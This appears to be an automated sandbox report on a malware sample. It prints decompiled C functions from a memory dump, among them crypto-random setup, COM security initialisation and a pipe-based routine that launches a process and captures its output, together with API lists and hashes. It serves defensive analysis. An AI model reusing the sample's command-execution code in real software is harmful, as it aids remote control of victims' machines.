                                                                                                                                                                                                0x00b01749
                                                                                                                                                                                                0x00b0174d
                                                                                                                                                                                                0x00b01753
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0175e
                                                                                                                                                                                                0x00b01767
                                                                                                                                                                                                0x00b0176b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0176d
                                                                                                                                                                                                0x00b0176f
                                                                                                                                                                                                0x00b01777
                                                                                                                                                                                                0x00b01779
                                                                                                                                                                                                0x00b0177a
                                                                                                                                                                                                0x00b01782
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,00AF763B,?,?,00000000,?), ref: 00B01703
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00B0171B
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00B0172A
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00B01739
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                • API String ID: 667068680-129414566
                                                                                                                                                                                                • Opcode ID: c60d2a3d68ee4f52b934ebab0631e86eee842bd8befe365b8fbfa67b5d2ffd28
                                                                                                                                                                                                • Instruction ID: e288c46912feb00802ca88fd715c0e82f99b79afc31ad2ec4ac3e24ab308830f
                                                                                                                                                                                                • Opcode Fuzzy Hash: c60d2a3d68ee4f52b934ebab0631e86eee842bd8befe365b8fbfa67b5d2ffd28
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B11C671A40615BBDB225BBE8C84EAF7FFCEF45740F4404A4E951E31D0EA70CE018AA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00B0215A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                			E00B0215A(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00B022BD();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L00B02305();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00AF86E7(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0xb009ea
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                                                                                                                                                                                                0x00b0215d
                                                                                                                                                                                                0x00b02162
                                                                                                                                                                                                0x00b02166
                                                                                                                                                                                                0x00b02166
                                                                                                                                                                                                0x00b0216b
                                                                                                                                                                                                0x00b02170
                                                                                                                                                                                                0x00b02171
                                                                                                                                                                                                0x00b02174
                                                                                                                                                                                                0x00b02175
                                                                                                                                                                                                0x00b0217a
                                                                                                                                                                                                0x00b0217d
                                                                                                                                                                                                0x00b0217e
                                                                                                                                                                                                0x00b02183
                                                                                                                                                                                                0x00b0218a
                                                                                                                                                                                                0x00b02230
                                                                                                                                                                                                0x00b02230
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02199
                                                                                                                                                                                                0x00b02199
                                                                                                                                                                                                0x00b021a0
                                                                                                                                                                                                0x00b021a4
                                                                                                                                                                                                0x00b021ab
                                                                                                                                                                                                0x00b021b4
                                                                                                                                                                                                0x00b021b6
                                                                                                                                                                                                0x00b021b6
                                                                                                                                                                                                0x00b021b4
                                                                                                                                                                                                0x00b021c5
                                                                                                                                                                                                0x00b021eb
                                                                                                                                                                                                0x00b021f4
                                                                                                                                                                                                0x00b021f6
                                                                                                                                                                                                0x00b021fc
                                                                                                                                                                                                0x00b0222b
                                                                                                                                                                                                0x00b0222b
                                                                                                                                                                                                0x00b02233
                                                                                                                                                                                                0x00b02236
                                                                                                                                                                                                0x00b02236
                                                                                                                                                                                                0x00b021fe
                                                                                                                                                                                                0x00b021ff
                                                                                                                                                                                                0x00b02205
                                                                                                                                                                                                0x00b02207
                                                                                                                                                                                                0x00b02207
                                                                                                                                                                                                0x00b0220c
                                                                                                                                                                                                0x00b0220b
                                                                                                                                                                                                0x00b0220b
                                                                                                                                                                                                0x00b02213
                                                                                                                                                                                                0x00b0221f
                                                                                                                                                                                                0x00b02229
                                                                                                                                                                                                0x00b02229
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b021d5
                                                                                                                                                                                                0x00b021d5
                                                                                                                                                                                                0x00b021d5
                                                                                                                                                                                                0x00b021db
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b021dd
                                                                                                                                                                                                0x00b021e3
                                                                                                                                                                                                0x00b021e8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b021e8
                                                                                                                                                                                                0x00b021c5

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strchr$_snprintflocaleconv
                                                                                                                                                                                                • String ID: %.*g
                                                                                                                                                                                                • API String ID: 1910550357-952554281
                                                                                                                                                                                                • Opcode ID: 097a9b1a483c91d0c97b532d42bf1d83d3f9611918ae2bc1a2423cae38386bfa
                                                                                                                                                                                                • Instruction ID: 0ea98a9de41edccd7386c7de003231cd7951298259203088e14d194ac2e098f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 097a9b1a483c91d0c97b532d42bf1d83d3f9611918ae2bc1a2423cae38386bfa
                                                                                                                                                                                                • Instruction Fuzzy Hash: BF2148762446052AD7255BA8ECCDB6B7FCCEF05720F1401D5FA408A2C2DA75DD4882A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00B002EA, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snprintfqsort
                                                                                                                                                                                                • String ID: %I64d$false$null$true
                                                                                                                                                                                                • API String ID: 756996078-4285102228
                                                                                                                                                                                                • Opcode ID: ffa92c4de3096342d87f77d895fdd7994b491cb2fd30e4f5906c2860b0e99d84
                                                                                                                                                                                                • Instruction ID: 9580fd42f4d76791c0f72eae433df8672b9805448f8042b9d38bf2b39e9f1254
                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa92c4de3096342d87f77d895fdd7994b491cb2fd30e4f5906c2860b0e99d84
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE17F7152020ABFDF11AF64CC82FAF3FE9EF59340F1080A9FD1596191E631DA609BA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFD78A, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFD79E
                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00AFD7A6
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFD7BA
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFD835
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFD838
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFD83D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                • Opcode ID: e32b3dacb1af8dfd2b315176a772aeadf8812d358e08236597f9a0d56d7cc2a1
                                                                                                                                                                                                • Instruction ID: e157eab5f8066c35b7afa028e17947f932214f6c61b6b3e4c6bf4963470f7de5
                                                                                                                                                                                                • Opcode Fuzzy Hash: e32b3dacb1af8dfd2b315176a772aeadf8812d358e08236597f9a0d56d7cc2a1
                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21F775A0021CAFDB01DFA5CC88DAFBBBDEF48354B10449AF505E7251DA71AE05DBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00B0082F, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                                • API String ID: 0-2132903582
                                                                                                                                                                                                • Opcode ID: 04619db877638d261879d392a12905ffde1f4938fdaa2ed52d63b66d004af950
                                                                                                                                                                                                • Instruction ID: f0bea805f6eaa9c086ef337ed7444325d5c0e05958cf25fbe570983af514488b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 04619db877638d261879d392a12905ffde1f4938fdaa2ed52d63b66d004af950
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7541CA3162030557FB247A5C8D9ABBE3EE4EF45710F1400F5F982E62D3D661CE9196D1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFD565, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 30%
                                                                                                                                                                                                			E00AFD565(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0xb0b848, 0, 1, 0xb0b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00AF85E5(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                                                0x00afd572
                                                                                                                                                                                                0x00afd575
                                                                                                                                                                                                0x00afd578
                                                                                                                                                                                                0x00afd589
                                                                                                                                                                                                0x00afd58f
                                                                                                                                                                                                0x00afd5a0
                                                                                                                                                                                                0x00afd5a8
                                                                                                                                                                                                0x00afd5f9
                                                                                                                                                                                                0x00afd5f9
                                                                                                                                                                                                0x00afd5fe
                                                                                                                                                                                                0x00afd603
                                                                                                                                                                                                0x00afd603
                                                                                                                                                                                                0x00afd606
                                                                                                                                                                                                0x00afd60b
                                                                                                                                                                                                0x00afd610
                                                                                                                                                                                                0x00afd610
                                                                                                                                                                                                0x00afd613
                                                                                                                                                                                                0x00afd5aa
                                                                                                                                                                                                0x00afd5ab
                                                                                                                                                                                                0x00afd5b1
                                                                                                                                                                                                0x00afd5c2
                                                                                                                                                                                                0x00afd5c7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afd5c9
                                                                                                                                                                                                0x00afd5d6
                                                                                                                                                                                                0x00afd5de
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afd5e0
                                                                                                                                                                                                0x00afd5e2
                                                                                                                                                                                                0x00afd5ea
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afd5ec
                                                                                                                                                                                                0x00afd5ef
                                                                                                                                                                                                0x00afd5f5
                                                                                                                                                                                                0x00afd5f5
                                                                                                                                                                                                0x00afd5ea
                                                                                                                                                                                                0x00afd5de
                                                                                                                                                                                                0x00afd5c7
                                                                                                                                                                                                0x00afd618

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD578
                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD589
                                                                                                                                                                                                • CoCreateInstance.OLE32(00B0B848,00000000,00000001,00B0B858,?,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD5A0
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFD5AB
                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD5D6
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1610782348-0
                                                                                                                                                                                                • Opcode ID: db985832b1312899c2120c990a3aa754436c985919a11b6b2a61cafc5f06f068
                                                                                                                                                                                                • Instruction ID: dab049af343353be544fdd0548843016b8d0f26a7b672ee2f81f710eb5f2ede9
                                                                                                                                                                                                • Opcode Fuzzy Hash: db985832b1312899c2120c990a3aa754436c985919a11b6b2a61cafc5f06f068
                                                                                                                                                                                                • Instruction Fuzzy Hash: 46210930600249BBD7258BA6DC4DE6BBFBDEFC6B15F10415DB601AB2A0DB709A01CA70
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00B02237, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                			E00B02237(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L00B02305();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00B022C9();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0xb08250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00B022C9();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0xb08258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                                                                                                                                                                                                0x00b02237
                                                                                                                                                                                                0x00b0223f
                                                                                                                                                                                                0x00b02244
                                                                                                                                                                                                0x00b02247
                                                                                                                                                                                                0x00b0224c
                                                                                                                                                                                                0x00b02252
                                                                                                                                                                                                0x00b0225b
                                                                                                                                                                                                0x00b0225f
                                                                                                                                                                                                0x00b0225f
                                                                                                                                                                                                0x00b0225b
                                                                                                                                                                                                0x00b02261
                                                                                                                                                                                                0x00b02266
                                                                                                                                                                                                0x00b0226f
                                                                                                                                                                                                0x00b02274
                                                                                                                                                                                                0x00b02277
                                                                                                                                                                                                0x00b02280
                                                                                                                                                                                                0x00b02282
                                                                                                                                                                                                0x00b02289
                                                                                                                                                                                                0x00b0229a
                                                                                                                                                                                                0x00b0229a
                                                                                                                                                                                                0x00b0229c
                                                                                                                                                                                                0x00b022a4
                                                                                                                                                                                                0x00b022ab
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b022a6
                                                                                                                                                                                                0x00b022aa
                                                                                                                                                                                                0x00b022aa
                                                                                                                                                                                                0x00b0228b
                                                                                                                                                                                                0x00b0228b
                                                                                                                                                                                                0x00b02291
                                                                                                                                                                                                0x00b02293
                                                                                                                                                                                                0x00b02298
                                                                                                                                                                                                0x00b022ae
                                                                                                                                                                                                0x00b022b1
                                                                                                                                                                                                0x00b022b6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b02298

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _errno$localeconvstrchrstrtod
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1035490122-0
                                                                                                                                                                                                • Opcode ID: 3529b2aa341f73d116a5920037f50c9d36422ecffe9bd8eb07aa47b601c7981a
                                                                                                                                                                                                • Instruction ID: 2b0c5d1d501ee5792950c95703a21feb008cf24e200e61fe6f0746773f7c0c22
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3529b2aa341f73d116a5920037f50c9d36422ecffe9bd8eb07aa47b601c7981a
                                                                                                                                                                                                • Instruction Fuzzy Hash: EA014735800205AFDB022FA4E90D7997FE4EF4A3A0F2101D0E980772E1CF74996CC7A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA9F9, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                			E00AFA9F9(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E00AF85FB( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00AF85E5(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0xb0e684; // 0x4d3f6c8
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0xb0e684; // 0x4d3f6c8
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0xb0e684; // 0x4d3f6c8
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E00AF9187(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00AF9273(_t127);
						E00AF85FB( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E00AFC3BB(_t127));
				_t98 =  *0xb0e68c; // 0x4d3f890
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0xb0e684; // 0x4d3f6c8
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00AF9237(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E00AF85FB( &_v32, 0);
				return _t128;
			}




































                                                                                                                                                                                                0x00afaa04
                                                                                                                                                                                                0x00afaa06
                                                                                                                                                                                                0x00afaa12
                                                                                                                                                                                                0x00afaa17
                                                                                                                                                                                                0x00afaa1a
                                                                                                                                                                                                0x00afaa1c
                                                                                                                                                                                                0x00afaa1f
                                                                                                                                                                                                0x00afaa22
                                                                                                                                                                                                0x00afaa29
                                                                                                                                                                                                0x00afaa2c
                                                                                                                                                                                                0x00afaa33
                                                                                                                                                                                                0x00afaa36
                                                                                                                                                                                                0x00afaa40
                                                                                                                                                                                                0x00afaa41
                                                                                                                                                                                                0x00afaa44
                                                                                                                                                                                                0x00afaa46
                                                                                                                                                                                                0x00afaa47
                                                                                                                                                                                                0x00afaa5e
                                                                                                                                                                                                0x00afabde
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afabde
                                                                                                                                                                                                0x00afaa75
                                                                                                                                                                                                0x00afabaa
                                                                                                                                                                                                0x00afabb0
                                                                                                                                                                                                0x00afabbb
                                                                                                                                                                                                0x00afabbd
                                                                                                                                                                                                0x00afabc5
                                                                                                                                                                                                0x00afabc5
                                                                                                                                                                                                0x00afabcc
                                                                                                                                                                                                0x00afabce
                                                                                                                                                                                                0x00afabd7
                                                                                                                                                                                                0x00afabd7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afabda
                                                                                                                                                                                                0x00afaa7b
                                                                                                                                                                                                0x00afaa7e
                                                                                                                                                                                                0x00afaa81
                                                                                                                                                                                                0x00afaa87
                                                                                                                                                                                                0x00afaa91
                                                                                                                                                                                                0x00afaa9b
                                                                                                                                                                                                0x00afaaa2
                                                                                                                                                                                                0x00afaaab
                                                                                                                                                                                                0x00afaaad
                                                                                                                                                                                                0x00afaab3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afaabe
                                                                                                                                                                                                0x00afaac5
                                                                                                                                                                                                0x00afaac6
                                                                                                                                                                                                0x00afaacb
                                                                                                                                                                                                0x00afaacc
                                                                                                                                                                                                0x00afaacd
                                                                                                                                                                                                0x00afaad2
                                                                                                                                                                                                0x00afaad4
                                                                                                                                                                                                0x00afaad5
                                                                                                                                                                                                0x00afaad6
                                                                                                                                                                                                0x00afaad9
                                                                                                                                                                                                0x00afaadf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afaae5
                                                                                                                                                                                                0x00afaaed
                                                                                                                                                                                                0x00afaaf0
                                                                                                                                                                                                0x00afaaf8
                                                                                                                                                                                                0x00afaafb
                                                                                                                                                                                                0x00afaafe
                                                                                                                                                                                                0x00afab04
                                                                                                                                                                                                0x00afab18
                                                                                                                                                                                                0x00afab1e
                                                                                                                                                                                                0x00afab24
                                                                                                                                                                                                0x00afab4d
                                                                                                                                                                                                0x00afab26
                                                                                                                                                                                                0x00afab26
                                                                                                                                                                                                0x00afab28
                                                                                                                                                                                                0x00afab2a
                                                                                                                                                                                                0x00afab32
                                                                                                                                                                                                0x00afab3a
                                                                                                                                                                                                0x00afab3f
                                                                                                                                                                                                0x00afab3f
                                                                                                                                                                                                0x00afab53
                                                                                                                                                                                                0x00afab55
                                                                                                                                                                                                0x00afab55
                                                                                                                                                                                                0x00afab5d
                                                                                                                                                                                                0x00afab65
                                                                                                                                                                                                0x00afab66
                                                                                                                                                                                                0x00afab6b
                                                                                                                                                                                                0x00afab74
                                                                                                                                                                                                0x00afab94
                                                                                                                                                                                                0x00afab94
                                                                                                                                                                                                0x00afab9c
                                                                                                                                                                                                0x00afab9f
                                                                                                                                                                                                0x00afaba7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afaba7
                                                                                                                                                                                                0x00afab7d
                                                                                                                                                                                                0x00afab81
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afab89
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFAA36
                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 00AFAA5A
                                                                                                                                                                                                • CreatePipe.KERNEL32(00AF658A,?,0000000C,00000000), ref: 00AFAA71
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                  • Part of subcall function 00AF85FB: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateHeapPipe$AllocateFreememset
                                                                                                                                                                                                • String ID: D
